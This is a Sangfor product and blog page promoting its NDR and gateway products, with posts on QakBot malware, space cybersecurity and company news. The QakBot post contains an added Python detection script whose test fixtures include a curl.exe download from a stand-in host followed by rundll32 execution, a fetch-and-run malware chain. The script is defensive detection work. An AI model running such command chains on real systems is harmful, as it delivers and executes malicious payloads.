Advanced Network Detection and Response (NDR)

Cyber Command can be trusted to improve your organization's overall IT security while eliminating potential cyber-security risks:

  • Best-in-class threat detection and response capabilities that monitor internal network traffic.
  • Correlates existing security incidents by applying AI and behavior-analysis technology, all aided by global threat intelligence.
  • Uncovers existing security breaches while analyzing their impact and identifying threats hidden inside the network.
  • Integrates network and endpoint security solutions to respond to threats automatically and simply.

Advantages: Making Cyber Threat Hunting Simpler

Sangfor Cyber Command offers clients a number of advantages for advanced security and threat detection.

Cyber Command is paired with threat intelligence and covers attacks at every level of the attack chain, which means faster alerts for exploitation attempts, slow brute-force attacks, C&C activity, lateral movement, P2P traffic, and data theft. Faster response comes from incident investigation and tight integration with network and endpoint security solutions.

Using several security products and managing them from a single dashboard can be a challenge. Sangfor Cyber Command, combined with Sangfor Endpoint Secure and the Next Generation Firewall (NGAF), provides flexible and effective security in a simplified and comprehensive way, offering recommendations on endpoint policy, network correlation, and patching.

Sangfor Cyber Command offers integrated, complete threat detection and protection that will not damage the system and is far more cost-effective than other security software options, such as SIEM solutions.

Cyber Command uses intelligent machine learning to detect all potential threats in the system. It performs a comprehensive impact analysis of known breaches to identify "patient zero" by evaluating all possible entry points. Cyber Command's unique "Golden Eye" feature can also learn the behavior of compromised assets, such as inbound and outbound connections and port and protocol usage, and uses this valuable information to strengthen external and internal system defenses.

The Cyber Command Response Center provides a simplified yet detailed visual presentation of the entire attack chain, which lets you monitor the whole detection and elimination process from the convenience of one detailed dashboard. This gives you full transparency and a comprehensive view of your security infrastructure.

Cyber Command NDR Features and Capabilities

Awards & Achievements

Top 5 Global NDR Vendor

Top 5 NDR vendors worldwide by market share in Gartner® Market Share Report 2022

Top 5 Security Software Vendors

Highest 5 Vendors for Security Software by revenue in APAC - Gartner Market Share Data 2022

InfoSec Award Winner

Sangfor Named Winner of the Coveted Global InfoSec Awards During RSA Conference

Use Cases

Ransomware and Bitcoin Mining Security Incidents

  • Cyber Command uses a timeline to trace an attack back to its entry point and root cause.
  • AI and machine learning algorithms help Cyber Command detect hidden threats and C&C communication, stopping the spread of ransomware automatically.
  • Ensures clients can visualize all business risks that may arise from compromised business assets.

Insider Threats & Privileged Account Violations

Cyber Command provides effective detection and response for both external and internal threats, with internal DDoS attacks, DGA botnets, and any abnormal behavior detected by NTA and UEBA technology.

Continuous Threat Detection and Response

  • Cyber Command integrates with network and endpoint security products to provide detailed threat detection and response.
  • Unique algorithms automatically aggregate network logs, reducing the number of alerts and improving productivity.
  • AI-based policy analysis and real-time monitoring ensure that security rules effectively protect all business assets from new threats.

Whiteboard Story: What Is NDR?

Cyber Command lets you improve your overall IT security and risk posture by implementing Advanced Network Detection and Response (NDR) protocols. With so many cyber-security options available, it can be hard to find one that fits your business. Watch this detailed video explaining the key features of Sangfor's Cyber Command NDR platform and how it is tailored to your organization to provide holistic and comprehensive threat detection and response.

NDR Customer Testimonials

Sangfor Cyber Command is a truly cool product and helps us so much

IT Security Manager from a State and Local Government

A reliable NDR product with AI-powered technology

IT Manager from a Rail Transportation industry

The response module and golden eye of this product is very cool

CIO from a Communications Equipment industry

It is a very popular NDR product in China and good enough to try it

IT Operation Manager from a Construction industry

Success Stories

Below you will find all Sangfor Success Stories, classified by industry, such as Enterprise, Government, Schools & Universities, etc.

FRIEM S.p.A

Cyber Guardian Success Story of a Malaysian Government Department

Sangfor for Government Agencies

Malaysian Government Department

PT Terminal Petikemas Surabaya (TPS)

Transportation

Multinational Vietnamese Manufacturer

Sangfor Manufacturing

Sangfor Services & Solutions

Get started now and put our products to work for your business.

  • Samudera Indonesia's IT Transformation: Powering Logistics Excellence with Sangfor Technologies
  • Customer Testimonial - SGE SYSCOM
  • Customer Testimonial - FRIEM SPA x Sangfor Cyber Command
  • Cyber Command Correlates with HCI to Automatically Deal with Network Threats
  • Cyber Command Correlates with NGAF to Automatically Deal with Network Threats
  • Cyber Command Correlates with Endpoint Secure to Automatically Deal with Network Threat
  • Sangfor Cyber Command: Online Demo
  • Guy Rosefelt Interview with Cyber Defense Magazine 2022

Latest Blog Posts
Cyber Security

QakBot Malware: Everything You Need to Know

Cyber-attacks in the modern age are becoming increasingly complex. As threat actors choose more sophisticated methods, the use of newer malware is growing. Malware is any type of software used to harm a computer or network. Malware files disguise themselves as harmless to get users to open them, after which they infect the network. Malware attacks have been on the rise these last few years. In 2022, Statista reported that global malware attacks reached 5.5 billion. The escalating issue is something to take note of. Lately, the QakBot malware has been making more headlines – however, this time for a good reason.

FBI Take Down QakBot

The FBI recently dismantled the QakBot malware’s infrastructure and identified more than 700,000 infected computers worldwide - including more than 200,000 in the United States. Many countries, including the US, France, Germany, the Netherlands, the United Kingdom, Romania, and Latvia, worked together to stop the "qbot" malware. This malware caused ransomware attacks and resulted in billions of dollars in damage.

The Department assured the public in its release that the QakBot malicious code was being deleted from victim computers - preventing it from doing any more harm. It also announced the seizure of more than US$ 8.6 million in cryptocurrency in illicit profits. The agency redirected QakBot botnet traffic to and through FBI servers, which prompted the infected computers to download a new file. This file would then uninstall the QakBot malware and “untether” the victim’s computer from the QakBot botnet.

Martin Estrada, a US Attorney, said that the operation also led to the seizure of almost 9 million dollars in cryptocurrency from the QakBot cybercriminal organization, which would be made available to victims. The operation – named Duck Hunt – is also the largest US-led financial and technical disruption of a botnet infrastructure leveraged by cybercriminals to commit ransomware, financial fraud, and other cyber-enabled criminal activity.

What Is QakBot Malware?

QakBot – also known as “qbot” or “Pinkslipbot” – was discovered in 2008. As one of the largest and longest-running botnets to date, it has made quite a name for itself. Qbot is a Windows malware that started as a banking trojan. It later evolved into a malware dropper. The malware has been used to target financial institutions, critical infrastructure contractors, and medical device manufacturers on the West Coast.

QakBot steals sensitive information to self-propagate to other systems on the network. The malware has been used globally by several ransomware organizations - including Black Basta, Egregor, and Prolock.

The Cybersecurity and Infrastructure Security Agency (CISA) named QakBot as one of the top malware strains of 2021. The agency also released a report classifying the malware strain as a banking trojan that steals financial data, browser information or hooks, keystrokes, and credentials. According to another 2020 State of Malware report, QakBot was also named 9th on the list of “Top 10 Threats to Private Companies” and saw a 465% increase from 2019.

How Does QakBot Work?

QakBot is a second-stage malware, which means it needs to be introduced into the system by a first-stage downloader malware. The initial access can be gained through various techniques – such as malspam, phishing, vulnerability exploitation, or insider attacks. Once inside the system, the qbot malware steals credentials and spreads to other hosts on the network using Microsoft’s PowerShell and the Mimikatz exploit kit.

The multiple modules of the QakBot malware also allow qbot to use several methods to steal credentials, including:

  • Keyboard stroke monitoring.
  • Searching browser caches for stored passwords.
  • Enumerating system files to find password hashes.

The qbot malware allows threat actors to perform manual attacks through remote code execution (RCE). Once a computer is infected, qbot can also deliver additional malware to it, such as ransomware. The malware has been updated and adapted many times to help hackers by performing reconnaissance and lateral movement, gathering and exfiltrating data, or delivering other payloads on affected devices.

Victim computers then become part of the botnet. A botnet is a network of compromised computers that the hackers control. The users are often unaware of this infection until it's too late.

QakBot Malware Infrastructure

QakBot uses a command-and-control infrastructure to carry out attacks globally, according to FBI Director Christopher Wray. In a joint advisory by CISA and the FBI, QakBot’s modular structure was found to be responsible for many malicious features. These have included process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike, Brute Ratel, and other malware.

QakBot’s infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. The advisory also revealed that at any given time, thousands of victim computers running Microsoft Windows were infected with QakBot as the botnet was controlled through three tiers of C2 servers.

Figure 1: QakBot’s Tiered C2 Servers Infrastructure, Sourced from CISA

The advisory further noted that the first tier of C2 servers in the QakBot infrastructure included a subset of thousands of bots selected by the malware’s administrators. These were promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes then communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers.

CISA stated that as of mid-June 2023, 853 supernodes have been identified in 63 countries - which were all active that same month. The supernodes also frequently change, which helps the malware avoid detection by network protection systems. Every bot has been seen communicating with a set of Tier 1 supernodes to relay messages to the Tier 2 C2 servers - serving as proxies to conceal the main C2 server. The 3rd tier server controls all of the bots.

Microsoft has also taken a swing at breaking down the infrastructure of the QakBot malware. From its research, the company noted that the qbot might present itself differently on different devices. QakBot was also noted to have three email delivery methods - malicious links, malicious attachments, or embedded images.

However, according to Microsoft, the qbot infrastructure seemed to always have the same basic “building blocks” in each campaign that can be rearranged or replaced according to the device, as shown in Figure 2. These included:

  • The Delivery Blocks – Attachment, Hyperlink, or Embedded Image
  • Macros
  • QakBot Payload
  • Process Injection
  • Credential Theft
  • Scheduled Task
  • Email Exfiltration
  • Lateral Movement
  • Cobalt Strike
  • Ransomware

Figure 2. Sample differences among devices affected by a single QakBot campaign. Sourced from Microsoft

The QakBot emails sent would all contain hyperlinks missing the HTTP or HTTPS protocols – which allowed the links to avoid sandboxing but also meant the user had to manually copy and paste the link in the search bar to open the file.

Between September and November 2023, Microsoft observed some of the following attachment naming patterns:

  • CMPL-[digits]-[month]-[day].zip
  • Compensation_Reject-[digits]-[mmddyyyy].zip
  • Document_[digits]-[mmddyyyy].zip
  • Document_[digits]-Copy.zip
  • PRMS-[digits].zip
  • Rebate-[digits]-[mmddyyyy].zip
  • REF-[digits]-[month]-[day].zip
  • TXN-[digits].zip

Despite varying delivery methods, the QakBot campaigns all use malicious macros in Office documents - specifically Excel 4.0 macros. Once enabled, the macros connect to a predefined set of IP addresses or domains to download the malicious files.

The QakBot OneNote Attacks

In January of this year, Microsoft’s OneNote service was used to deliver the QakBot malware. As mentioned before, QakBot campaigns would use Microsoft Office attachments to spread. However, the company began rolling out versions of Office that could block XL4 and VBA macros by default in early 2022.

Threat actors then began using HTML attachments. In May 2022, the Follina vulnerability (CVE-2022-30190) in Microsoft’s Support Diagnostic Tool (MSDT) became the ideal opportunity for qbot hackers to deliver the QakBot payload.

In December 2022, the QakBot threat actors turned their attention to OneNote due to its ability to embed executable file types - such as HTA files, CMD files, and BAT files. Since then, OneNote has been used to deliver a variety of malware strains, including Formbook, AsyncRAT, and Emotet.

The malware campaign – dubbed QakNote – was inspected by cybersecurity specialists who noted two parallel spam campaigns distributing malicious Microsoft OneNote attachments embedded with an HTML application – or HTA file. In one, the hackers would send impersonal malspam with an embedded link to the weaponized “.one” file. In the other, the hackers would use the thread injection method to hijack existing email threads and send a reply-to-all message to their participants with an attached malicious OneNote notebook. However, the subject matter within the messages would be different.

Most attachments used in the QakNote campaign would be named either:

  • ApplicationReject_#####(Jan31)[.]one
  • ComplaintCopy_#####(Feb01)[.]one

A fake button then prompts the user to double-click to download the attachment. The hackers can then run the embedded HTA attachment file that further retrieves the QakBot payload.

Example of a malicious Microsoft OneNote attachment. Sourced from BleepingComputer

After being launched, those attachments execute commands on the device to download and install QBot. Most of the .hta files contain identical scripting language and instructions for the rest of the attack to follow. The HTA file script uses the legitimate curl.exe application to download a QBot payload to the C:\ProgramData folder, and the payload is then executed using Rundll32[.]exe.

The QakBot payload then injects itself into the Windows Assistive Technology manager (AtBroker.exe) to conceal its presence and evade detection from AV tools running on the device.

About Sangfor

Sangfor Technologies is a world-class cybersecurity and cloud computing company that offers intensive and advanced Anti-Ransomware prevention and state-of-the-art IT infrastructure. Protect your data and network from malware using the Sangfor Next-Generation Firewall (NGFW) integrated with Endpoint Security to identify malicious files at both the network level and endpoints and so much more. For more information on Sangfor’s cybersecurity and cloud computing solutions, please visit www.sangfor.com.
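The indicators in the QakBot article above (the attachment naming patterns and the OneNote, HTA, curl.exe, rundll32 execution chain) can be checked mechanically against mail and process-creation logs. The following Python is an added example, not code from Sangfor, Microsoft or CISA; the event field names, the expansions chosen for the placeholders, the use of mshta.exe as the HTA host, and all sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Filename templates copied from the article (with [.] refanged to a plain dot).
TEMPLATES = [
    "CMPL-[digits]-[month]-[day].zip",
    "Compensation_Reject-[digits]-[mmddyyyy].zip",
    "Document_[digits]-[mmddyyyy].zip",
    "Document_[digits]-Copy.zip",
    "PRMS-[digits].zip",
    "Rebate-[digits]-[mmddyyyy].zip",
    "REF-[digits]-[month]-[day].zip",
    "TXN-[digits].zip",
    "ApplicationReject_#####(Jan31).one",
    "ComplaintCopy_#####(Feb01).one",
]

# Assumed expansions: the article does not say how [month]/[day] are written,
# and the (Jan31)/(Feb01) suffix is generalised to any (MonDD) date.
PLACEHOLDERS = {
    "[digits]": r"\d+",
    "[mmddyyyy]": r"\d{8}",
    "[month]": r"(?:[A-Za-z]{3,9}|\d{1,2})",
    "[day]": r"\d{1,2}",
    "#####": r"\d+",
    "(Jan31)": r"\([A-Za-z]{3}\d{2}\)",
    "(Feb01)": r"\([A-Za-z]{3}\d{2}\)",
}

def template_to_regex(template):
    """Escape the literal parts of a template, then expand its placeholders."""
    pattern = re.escape(template)
    for token, expansion in PLACEHOLDERS.items():
        pattern = pattern.replace(re.escape(token), expansion)
    return re.compile(pattern, re.IGNORECASE)

FILENAME_RULES = [(t, template_to_regex(t)) for t in TEMPLATES]

def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()

def match_attachment(name):
    """Return the article template that an attachment name fits, or None."""
    base = basename(name)
    for template, rx in FILENAME_RULES:
        if rx.fullmatch(base):
            return template
    return None

# Execution chain from the article: HTA launched from OneNote, curl.exe writing
# to C:\ProgramData, rundll32.exe running a file from C:\ProgramData.
# mshta.exe is the Windows host program for .hta files; the article does not name it.
CURL_OUT = re.compile(r'\s(?:-o|--output)\s+"?c:\\programdata\\', re.IGNORECASE)
PD_PATH = re.compile(r'c:\\programdata\\', re.IGNORECASE)

STAGES = [
    ("hta_from_onenote", lambda e: basename(e["parent"]) == "onenote.exe"
        and basename(e["image"]) == "mshta.exe"),
    ("curl_to_programdata", lambda e: basename(e["image"]) == "curl.exe"
        and CURL_OUT.search(e["cmdline"]) is not None),
    ("rundll32_from_programdata", lambda e: basename(e["image"]) == "rundll32.exe"
        and PD_PATH.search(e["cmdline"]) is not None),
]

def find_chains(events):
    """Per host, collect stages seen in chain order; report hosts with >= 2 stages."""
    progress = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["time"]):
        seen = progress[e["host"]]
        for idx, (_, pred) in enumerate(STAGES):
            if pred(e) and (not seen or idx > seen[-1]):
                seen.append(idx)
                break
    return {h: [STAGES[i][0] for i in s] for h, s in progress.items() if len(s) >= 2}

# Constructed process-creation events (hypothetical schema: time, host, parent, image, cmdline).
SAMPLE_EVENTS = [
    {"time": "2023-02-01T09:00:01", "host": "WS-01",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": r"mshta.exe attachment.hta"},
    {"time": "2023-02-01T09:00:03", "host": "WS-01",
     "parent": r"C:\Windows\System32\mshta.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\ProgramData\sample.dat http://example.invalid/x"},
    {"time": "2023-02-01T09:00:05", "host": "WS-01",
     "parent": r"C:\Windows\System32\mshta.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\sample.dat,PlaceholderExport"},
    # Benign look-alikes on another host: curl to Downloads, rundll32 on a system DLL.
    {"time": "2023-02-01T09:10:00", "host": "WS-02",
     "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\u2\Downloads\tool.zip https://example.invalid/tool.zip"},
    {"time": "2023-02-01T09:11:00", "host": "WS-02",
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for name in ("TXN-48213.zip", "ComplaintCopy_55123(Feb01).one", "invoice.zip"):
        print(name, "->", match_attachment(name))
    print(find_chains(SAMPLE_EVENTS))
```

Filename matches alone are weak signals because the templates are short and generic; correlating them with the ordered process chain on the same host is what keeps the benign curl.exe and rundll32.exe activity on WS-02 out of the results.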


Cyber Security

Elevating Visibility and Control with Sangfor Internet Access Gateway

In today's digital world, a Secure Web Gateway (SWG) remains the primary guardian for protecting your users' and applications' access to the internet. Some SWGs may provide complete control but lack full visibility into how effective those controls really are. This lack of visibility makes it difficult for users to improve operations and fully maximize their ROI. As organizations seek both control and visibility, it becomes imperative to explore alternatives that address this limitation. In this article, we'll discuss why replacing your current SWG with Sangfor IAG (Internet Access Gateway) is a smart choice and highlight its benefits with a real-world case study.

Why Replace Your Current SWG?

There are several compelling reasons to consider replacing your existing SWG:

Lack of Technical Support

One of the primary challenges organizations face with SWG vendors is the common decision to exit countries that the vendor does not find profitable, especially after a company merger or acquisition, leaving support to be provided by inadequately trained resellers. When issues arise or you need assistance, a responsive and knowledgeable local support team is critical. SWG customers are often frustrated trying to get immediate support from vendors, especially when active licenses are pending renewal. Resellers are under pressure to get this sorted out, while customers worry about the impact this may have on their business if unnecessary expiration causes downtime.

Product End-of-Life/End-of-Support

Your current SWG may no longer be supported because the product is reaching its end-of-life or end-of-support. This happens because the vendor is consolidating or reducing product lines, leaving your network vulnerable to emerging threats.

Infrequent Updates

Staying ahead of cyber threats requires continuous innovation and regular updates. Many SWG solutions are not core products of vendors and, therefore, may have less priority in developing upgrades or signature updates, leaving your organization exposed to new threats.

The Sangfor Internet Access Gateway Advantage

Sangfor IAG offers several advantages that make it a compelling choice for organizations seeking enhanced security control and visibility:

Easy Drop-in SWG Replacement: Sangfor IAG provides a seamless transition, eliminating the need for high overhead costs associated with migration. You can easily replace your existing SWG without disrupting your operations. You start saving long past initial procurement because switching to Sangfor IAG will significantly reduce your 3-year total cost of ownership.

| Subscription | FortiProxy | Sangfor IAG | Comparison |
|---|---|---|---|
| Basic Protection | SWG Protection | Essential Bundle | Save 30% |
| Premium Protection | SWG Protection & Content Analysis | Premium Bundle | Save 35% |

| Subscription | Blue Coat SG | Sangfor IAG | Comparison |
|---|---|---|---|
| Basic Protection | Webfilter perpetual/support, Reporter | Essential Bundle | Save 30% |
| Premium Protection | Webfilter perpetual/support, Reporter, Content Analysis System | Premium Bundle | Save 35% |

Migrate Connectivity and Security Policies: Sangfor IAG simplifies the migration process by helping you move over your existing connectivity and security policies. This ensures a smooth transition while maintaining control over your network. With our latest web user interface, the configuration and migration process is more seamless than before. Where some configurations are not 100% replicas of other vendors', our technical support teams are always ready to assist you in transitioning over properly.

Optimized SaaS Application User Experience: In the era of cloud-based applications, ensuring a smooth and secure user experience for SaaS applications is crucial. Sangfor IAG is designed to optimize the performance of these applications, enhancing productivity. Our application database signatures are updated weekly, and the URL database updates twice every week. Sangfor IAG constantly updates newly discovered applications from submissions requested by our customers across the world. Customer benefits include content filtering, application control, and URL filtering, as well as being able to manage and control critical applications without compromising employee productivity. Each application update includes main functions and sub-functions of application capabilities.

Key Benefits of Sangfor IAG

Migrating to Sangfor IAG offers a range of benefits for your organization:

  • Full SWG Capabilities at a Lower Cost: Sangfor IAG provides all the necessary SWG capabilities without the need for costly add-ons or "options." Why pay for features that should be included as standard?
  • Superior Local Sangfor Support and Expertise: With Sangfor, you can count on dedicated local support and expertise. This means faster response times and a deeper understanding of your unique needs.
  • Faster Access to Critical Business Applications: Sangfor IAG ensures faster access to critical business applications while allowing you to restrict recreational traffic. This not only enhances productivity but also strengthens your network security.

Finance Case Study

Customer Background

One of the top 10 largest banks in Southeast Asia faced several challenges:

  • Productivity Loss: Slow and intermittent Internet access was causing significant productivity loss among employees.
  • Complex Policies: Thousands of access control policies made maintaining complex policy sets difficult and cumbersome.
  • Connectivity Issues: Poor connectivity during voice and video conferencing sessions due to misused bandwidth was hampering meetings and essential communications.

Sangfor IAG Benefits

By implementing Sangfor IAG, this banking institution experienced remarkable improvements:

  • Increased Uptime: Uptime increased by 30%, significantly improving accessibility to critical applications.
  • Simplified Control: The institution consolidated and streamlined its control with fewer policies, reducing the administrative burden.
  • Quality Conferencing: High-quality voice and video conferencing became the norm, enhancing communication and collaboration.

Conclusion

In conclusion, replacing your existing SWG with Sangfor IAG can lead to enhanced productivity, improved control, and significant cost savings. With a comprehensive feature set, local support, and a commitment to innovation, Sangfor IAG is a compelling choice for organizations looking to stay ahead in today's digital landscape.


Cyber Security

Space Cybersecurity: Exploring Challenges, and Opportunities

Mankind has always been reaching for the stars. From the development of the wheel to the first automobile, humans have never faltered in going beyond what was thought possible. Space travel is only one of the latest innovative and rapidly growing sectors of human intelligence and design to lift off the ground. The space industry is being privatized, and opportunities in space cybersecurity are increasing as well.

The global space economy hit record numbers in 2022 by reaching US$ 546 billion and is projected to climb another 41% over the next five years. This drastic rise is due to new technologies, an increase in private and public company space exploration, and investments from governments. A general interest in space ventures and technology has revolutionized the potential of space for the digital age. Unfortunately, space has to endure a lot more than just man-made devices bumbling around in orbit and now has to face the accompanying challenge of space cybersecurity as well.

Cybersecurity in Space: Recent Scenario

Now, you might think that space is far removed from your daily life, but most of the technologies and infrastructure we depend on are circling the planet. From telecommunications satellites and GPS to internet connectivity and weather tracking, technology in space is crucial for global communication and innovation. A cyber-attack on space infrastructure can have devastating effects on everyone on the ground.

Cybersecurity for space exploration is also important to maintain secure lines of communication, accurate navigation, and precise control. Space exploration is already a critical venture that requires certainty and stability to ensure the safety of astronauts, technicians, and more. This means that cybersecurity in space should be a priority concern.

One of the biggest space cybersecurity threats is hacking into spacecraft and satellites. Cybercriminals can easily take control of vital systems, manipulate controls, and steal confidential data. Jamming and spoofing methods are often used to disrupt or slow down the communication of data from satellites. The war in Ukraine saw the use of jamming and other cyberattacks on the Starlink SpaceX terminal. Military leaders have said that these tactics are common weapons.

A research paper from the University of Oxford has also stated that the threat of cyber-attacks has risen due to space systems becoming “increasingly interconnected and computationally complex.” However, most space stations and infrastructure were built before there was a global focus on cybersecurity. This means that these systems are highly complex but also highly vulnerable to cyber-attacks.

Two Biggest Telescopes Were Hacked - A Challenge in Space Cybersecurity

On the 1st of August, the National Science Foundation's National Optical-Infrared Astronomy Research Laboratory - or NOIRLab - reported a cybersecurity incident that halted operations at its Gemini North Telescope in Hawaii and Gemini South Telescope in Chile. These attacks came just a few days before the NCSC issued its advisory to American space companies and research organizations about the threat of cyber-attacks and espionage.

Smaller telescopes on Cerro Tololo in Chile were also affected and the staff are still unsure about how the attacks took place. According to a statement by NOIRLab, the recovery process of the affected facilities and telescopes is still ongoing. The scientific community suffers every moment that operations are disrupted by cyber-attacks – not only with expenses but also due to the data being lost during downtime.

FBI and Air Force Warn of Cyber-Attacks on Space Industry

In August, the FBI, the National Counterintelligence and Security Center (NCSC), and the Air Force Office of Special Investigations released a bulletin warning that foreign intelligence agencies could use cyber-attacks, shell companies, or old-fashioned espionage to collect sensitive information about American space capabilities or innovative technologies.

The agencies noted that these foreign intelligence entities “recognize the importance of the commercial space industry to the US economy and national security - including the growing dependence of critical infrastructure on space-based assets.” They go on to state that US space-related innovation and assets are seen as potential threats as well as valuable opportunities to acquire vital technologies and expertise.

The advisory went on to state that these attacks could also collect sensitive data related to satellite payloads to disrupt and degrade US satellite communications, remote sensing, and imaging capabilities while also targeting American commercial space infrastructure during international conflicts.

The advisory also claims that the global space economy will grow to more than US$ 1 trillion within seven years. The agencies warned that space infrastructure is “fundamental to every aspect of our society, including emergency services, energy, financial services, telecommunications, transportation, and food and agriculture.”

What are the Challenges in Space Cybersecurity

As mentioned before, cybersecurity for space has been a challenge due to the older systems being used. Most governments have yet to implement adequate cybersecurity measures in space projects due to a lack of funding, infrastructure, and skills. The complexity, interconnection, and rapid growth of the space sector also make it a wider target surface for hackers.

Limited Resources and Bandwidth Constraints

Without the right funding and internet, most countries around the world are battling to stay ahead in the space race. These limited resources can lead to low or non-existent security measures in place.

Vulnerabilities in Satellite Systems and Ground Infrastructure

With the complex operations spanning space, ground, links, and users, there are several potential vulnerabilities to contend with when it comes to space and ground infrastructure. Cyber threats now also have a larger target with the growing interest from private and commercial organizations. A few of the potentially vulnerable areas in existing space cybersecurity include:

  • Software-defined radio compromise.
  • Insider threats.
  • Hacking ground systems to interact with satellites.
  • Using design and hardware development to embed malicious features.
  • Communications hacking on TT&C systems through command link injections, replay attacks, or electronic attacks such as jamming and spoofing.
  • Software vulnerabilities.

Potential Impact of Cyber-Attacks on Space Missions

Cyber-attacks on space infrastructure can include malware installation, ransomware attacks, and data or system breaches. All these attacks can disrupt communications, supply chains, national security, internet access, and global economies. Space missions affected by cyber-attacks can also lead to the injury or death of astronauts, the destruction of property, and the halting of progress in space exploration.

What are the Opportunities in Space Cybersecurity?

As the space race intensifies and nations rush to create new and innovative technologies to keep up, cybersecurity for space is also becoming a lucrative market. Smaller businesses can seize this opportunity to fill the demand for cybersecurity measures for space technology. Forbes has listed a few ways that smaller companies can amplify their brand in this rapidly expanding sector:

  • Innovate and develop space cybersecurity solutions.
  • Stay informed on industry trends and legislation.
  • Establish thought leadership.
  • Collaborate with educational institutions.
  • Participate in industry associations and events.
  • Diversify service offerings.
  • Create strategic alliances.
  • Establish your brand as a pioneer in the field.

Cybersecurity Measures for Space Missions

Space systems can be vulnerable because of features like hardcoded credentials – which are used by ships, planes, and the military and can be accessed easily by hackers. This is why space missions need enhanced cybersecurity measures that ensure the safe transmission of data. Some of the cybersecurity measures that can be used include:

  • Secure Communication Protocols and Encryption Techniques: Keeping communications between ground and space stations secure is a crucial element of space cybersecurity. The use of encryption techniques will ensure a protected line of communication that can be vital for the safety of lives, data, and technology.
  • Authentication and Access Control Mechanisms: Maintaining the right access controls will ensure that only authorized personnel have access to critical infrastructure. Using a zero-trust policy will go a long way to keeping the space system secure.
  • Intrusion Detection and Prevention Systems: Cyber threats need to be identified, isolated, and mitigated by the infrastructure in place. Space missions need to employ active intrusion detection and threat intelligence to root out cyber-attacks before they can do any damage to the system.
  • Data Encryption and Protection Strategies: Hackers will try to exfiltrate satellite data or manipulate data to deliver incorrect transmissions. With data encryption, communications are secure, and the data cannot be stolen, manipulated, or damaged.

Space technology has advanced as the modern age has developed. Satellites are no longer merely amplifying signals but are growing much more complex and playing a much bigger role in communications on Earth. These innovative new designs have opened a whole world of opportunities for developers, engineers, and inventive minds. We just have to tread carefully and ensure that the future we create today can still be secure tomorrow.

Sangfor is a leading cybersecurity and cloud provider that believes in reaching beyond the stars to create a secure, innovative, and better future for us all. For more information on Sangfor’s cybersecurity and cloud computing solutions, please visit www.sangfor.com.


Latest News

News

Sangfor Endpoint Secure Earns AV-Test Top Product Award

Sangfor Technologies is pleased to announce that Sangfor Endpoint Secure has been awarded the "TOP PRODUCT" Award by AV-Test, a leading independent organization specializing in IT security product evaluation. In the latest testing of the best Windows antivirus software for business users, AV-Test continuously evaluated 18 endpoint protection products during July and August 2023. Sangfor Endpoint Secure was one of six products to achieve maximum scores across the three tested categories of Protection, Performance, and Usability.

Sangfor Endpoint Secure Test Results

Protection

In the Protection category, Sangfor Endpoint Secure was put through rigorous testing that mirrored real-world threats. AV-Test used two stages to assess protection capabilities. The first stage focused on protection against 0-day malware attacks from the Internet, including web and e-mail threats. The second stage evaluated the detection of widespread and prevalent malware discovered in the last 4 weeks. Sangfor Endpoint Secure excelled in both stages, scoring 100% in July and 99.4% in August against 0-day malware attacks, compared to an industry average of 99.7%. It also achieved perfect scores in detecting newly discovered widespread and prevalent malware.

These results confirm that Sangfor Endpoint Secure is highly effective against new and unknown threats. The product incorporates advanced behavioral analytics and is integrated with Sangfor Engine Zero AI-enabled malware detection and Sangfor Neural-X threat intelligence. These features enable it to identify new malware without relying solely on known signatures, making it highly adaptive in a landscape where new malware variants are continually emerging.

Performance

Performance was another category in which Sangfor Endpoint Secure stood out. AV-Test assessed the impact of security products on system speed while conducting everyday operations, such as launching websites and applications, downloading and installing applications, and copying files. Sangfor Endpoint Secure either matched or outperformed the industry average in all tested aspects, proving that robust security does not have to come at the cost of system performance and productivity.

Usability

In terms of Usability, Sangfor Endpoint Secure was tested on its ability to avoid inaccurate alerting, detection, and blocking of legitimate behaviors. Throughout the two months of testing, the product registered no false alarms, detections, or blockages across all tested behaviors.

This level of accuracy is especially significant as it minimizes interruptions to users and ensures smooth daily operations. These results are largely attributed to Endpoint Secure's advanced detection capability, as previously noted in the Protection category.

To read the original test results, please visit: https://www.av-test.org/en/antivirus/business-windows-client/windows-10/august-2023/sangfor-endpoint-secure-protect-3.2-232415/

Discover Sangfor Endpoint Secure

Sangfor Endpoint Secure is a comprehensive endpoint security product that combines Endpoint Detection and Response (EDR) with an Endpoint Protection Platform (EPP) in a unified solution. Endpoint Secure delivers end-to-end protection of endpoints before, during, and after attacks. Prevention mechanisms mitigate risks and vulnerabilities pre-attack, active and passive detection mechanisms identify and block threats during attacks, and remediation mechanisms eradicate residual threats and support forensic investigation post-attack.

Sangfor Endpoint Secure also features innovative anti-ransomware capabilities, including the world's first and only endpoint ransomware honeypot. This quickly detects and terminates the ransomware encryption process, minimizing system damage. The encryption-controlling application is also identified and located on other infected systems, allowing for a "One-Click Kill" feature that eradicates the detected ransomware throughout the organization with just a single mouse click.


News

Sangfor Technologies Expands into Mexico, Seeking New Partners in Latin America

Sangfor Technologies, a leading global provider of advanced cybersecurity and cloud solutions, is proud to announce its expansion into Latin America. The company has established dedicated sales and support teams in Mexico, adding to its existing network of more than 60 branch offices in over 12 countries across APAC and EMEA. This strategic move responds to the growing demand for cutting-edge cybersecurity and cloud solutions in the region, driven by rapid digitalization and government initiatives.

With this expansion, Sangfor Technologies underscores its commitment to assisting local organizations on their digital transformation journey. The company offers a comprehensive range of cybersecurity and cloud products and solutions, which are now available in Latin America.

“With Mexico as our first stop in the Latin America region, Sangfor solidifies its commitment to driving global digital transformation. This marks a pivotal step in our growth strategy, acknowledging the value we can bring to this region and beyond.”
Jackie Huo, General Manager of Sangfor Latin America

Sangfor Products and Solutions

